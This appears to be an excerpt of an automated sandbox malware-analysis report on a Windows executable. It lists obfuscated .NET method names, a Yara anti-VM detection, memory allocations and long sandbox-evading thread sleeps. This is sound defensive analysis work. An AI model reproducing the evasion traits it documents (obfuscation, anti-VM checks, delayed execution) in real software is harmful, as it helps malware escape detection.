Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, qhCMLXG09OUqG7U535.cs	High entropy of concatenated method names: 'rIe91q6vUK', 'VvP9JbBgTD', 'A669E2ryl7', 'yia9wsoJrb', 'j4j9fLJTmP', 'A9D9Ql6gUx', 'blmgxF9a2EX5oRVKCK', 'K0UqYSSIWkJWfZyn9I', 'DfL99sPatw', 'R9t9R2EP0x'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, PmP39Dql6gUxWtjOZt.cs	High entropy of concatenated method names: 'ah45LcekRq', 'YSH57yqwof', 'XOF5VTjcB3', 'pkQ51DQae1', 'nnF5JtK4p6', 'BU6VW2jXfG', 'r86VK6FrmE', 'vGkV0Gxvos', 'Vs6VyVoUqZ', 'UyBVjaQAK1'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, jWKGVIjcFMVgphwNTP.cs	High entropy of concatenated method names: 'TFudqGFDbI', 'SlJdiNTYZJ', 'LVMdSJruqT', 'x9OdcYeIdE', 'EGndOwd61m', 'eVTdAxElY8', 'ImwdvgyN18', 'vFEdxn5tUx', 'HwqdhLPqop', 'QpDdnEaDAb'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, ep7ohB7W7lhUl9qNVl.cs	High entropy of concatenated method names: 'Dispose', 'zHl9jbc1hT', 'aWSlieJsLv', 'cs7s2URC8A', 'iqV9bSS3UD', 'nUj9ziKJNC', 'ProcessDialogKey', 'Eb5l6WKGVI', 'IFMl9Vgphw', 'rTPllBuWrL'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, EJTdXMT4v12FlXTOst.cs	High entropy of concatenated method names: 'IEhm4QQqUZ', 'PfDmsOt3gP', 'h4LmqZbjv6', 'VwwmiwetkD', 'fvSmcDiO7Z', 'uQtmOB0BHN', 'Kv0mvn1ahr', 'YZqmxKPiY7', 'Cw2mnuxh0v', 'NI3mp0UonP'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, fHjkEEMXvsJjY5J9xj.cs	High entropy of concatenated method names: 'EditValue', 'GetEditStyle', 'Juxljk3CGI', 'nZalbFMfdp', 'rEJlzGbo0U', 'N6FR6NM7Ha', 'mYJR9EJAn5', 'H0JRlG5ev7', 'ljWRR6XmQ7', 'QJ23QqyFkyUIXFSFnRr'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, YKs5MSvJZJ9aYu0E82.cs	High entropy of concatenated method names: 'Rcd18LMsaq', 'zNn1M4jdEe', 'Kc815WEfeY', 'KgD5bECMoX', 'ckg5zYacjl', 'K6d16cyflQ', 'rmw19fHmjd', 'jCl1ldF8LN', 'pFt1RJD0Z5', 'fBT1GygJ20'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, SBRGILBnrOoaGSPMoe.cs	High entropy of concatenated method names: 'bI8PEr3KtB', 'jypPwuTvCs', 'ToString', 'xcvP8bwTHW', 'NYiP7Rgy7d', 'c34PMA1cJf', 'xAvPVqU9ZE', 'XnEP50v1We', 'A9tP1OFpqc', 'MJfPJ4TeHs'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, xq6vUK4KvPbBgTDCEE.cs	High entropy of concatenated method names: 'MOb7gvuwwg', 'd5m7aKPioy', 'FeP7DKcIgF', 's9a7BMQFhN', 'aQZ7WIg6CR', 'GPO7KcoQHI', 'Jr4703To7l', 'EHC7yXOd30', 'G6G7jHlrnw', 'T2R7br9V9L'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, IJr43mzeV3ygPM2Z4L.cs	High entropy of concatenated method names: 'T3quHYlI53', 'BTQu4uuD5A', 'PWbusi7PKU', 'AbuuqG0nub', 'orMuiOQHjx', 'HPaucHyb5S', 'FucuO0301T', 'eSEuo3xsBd', 'Dd9ueEUsKS', 'm5suIq0X2A'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, xlAYIbgcGyT3E3UKEJ.cs	High entropy of concatenated method names: 'apwfnr5lEu', 'CobfUfiTq3', 'Skhfg5DjWi', 'pNafaIy8lU', 'BgvfiGyydI', 'wpNfSio0L2', 'e0ufcPCXdq', 'rqhfOChcku', 'La1fAt7AS6', 'a9lfvViiJy'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, lR7P46lQl4vGorSblT.cs	High entropy of concatenated method names: 'jrNZjJ0My', 'zML39JBtX', 'NCkHPOkfu', 'QkFrG0Msr', 'hDpsiAwu4', 'B8CXhdFF2', 'LInBDTdOUjtpGbF8q3', 'HEnqypYlpmpDxdWPSU', 'nJxN5ZBqa', 'aWmuukaPx'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, yYao95K08DUdQC3iJB.cs	High entropy of concatenated method names: 'Hr9Py1hVF8', 'OZxPbJnoZm', 'oA5N6XEThK', 'PjhN9aGcB3', 'DCTPp0f7Af', 'V3CPUr58xn', 'EAwPTF2NOM', 'POJPg1tBqa', 'yq6Pa8LvWt', 'k20PDWQL5H'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, QnmRDFJR3fB8REvONB.cs	High entropy of concatenated method names: 'E3oRLr3uAR', 'X2hR8LP99t', 'EXdR7TiS44', 'FU8RM1qxVE', 'bcTRVVZVBx', 'ms9R5XTBEw', 'LbBR1xMAYW', 'efERJEFJ33', 'yYnR2AFrbX', 'xysREu6os3'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, ANAY5q99wlsQfZjI5fR.cs	High entropy of concatenated method names: 'B6eubNW6sq', 'dyDuzGVQYn', 'gFak6P54Co', 'pIjk9lpm05', 'ILgkl7ap10', 'ORCkR4358n', 'HFXkGgQ40P', 'eCikL4x9ub', 'Rghk8wFt9c', 'zITk77Iw6k'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, qcr6Mx0YyZHlbc1hT5.cs	High entropy of concatenated method names: 'xhZdfFp1uY', 'S3vdPYKNVI', 'HFeddAQic7', 'dSodkLsYOy', 'FkwdCPsOAg', 'kTHdoepfFf', 'Dispose', 'df8N8QbZnX', 'qRMN7OVvLd', 'stcNM3Yd5q'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, RlYPIh96Hi2ULTTKCdM.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'BKMupNsVjs', 'fTtuUynVKf', 'yyeuTyATyS', 'D5FugbjEY2', 'DLtuaZI4le', 'nMfuDBVvkZ', 'BcruB7Yndx'
Source: 0.2.UqdykLLTA2.exe.4cf12d8.3.raw.unpack, XVcimchNyDWrTgCFYJ.cs	High entropy of concatenated method names: 'sAB1ejRae5', 'Bs21IlFYDs', 'b2P1ZL3Xue', 'D3S13WNM9u', 'BS51F7bTXQ', 'Mtt1HAxI5g', 'BLm1rq08EI', 'XHW149AuUi', 'YUS1soHAXm', 'pfV1XH6kdu'

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: UqdykLLTA2.exe PID: 6372, type: MEMORYSTR

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 18F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 3280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 5280000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 91E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: A1E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: A3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: B3E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: BE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: CE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: DE10000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 30E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 32E0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Memory allocated: 52E0000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599656	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599547	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599437	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599327	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599218	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 599082	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598962	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598732	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598618	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598509	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598375	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598265	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598155	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 598047	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597937	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597828	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597719	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597609	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597496	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597388	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597266	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597156	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 597047	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596937	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596828	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596719	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596594	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596484	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596375	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596266	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596154	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 596032	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595906	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595794	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595451	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595333	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595203	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 595093	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594984	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594765	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594655	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594547	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594422	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594312	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594203	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 594093	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593984	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593875	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Thread delayed: delay time: 593765	Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Window / User API: threadDelayed 3183			Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe	Window / User API: threadDelayed 6654			Jump to behavior

Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 6572	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep count: 34 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -31359464925306218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7372	Thread sleep count: 3183 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7372	Thread sleep count: 6654 > 30	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599656s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599547s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599437s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599327s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599218s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -599082s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598962s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598732s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598618s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598509s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598375s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598265s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598155s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -598047s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597937s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597828s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597719s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597609s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597496s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\UqdykLLTA2.exe TID: 7368	Thread sleep time: -597388s >= -30000s	Jump to behavior
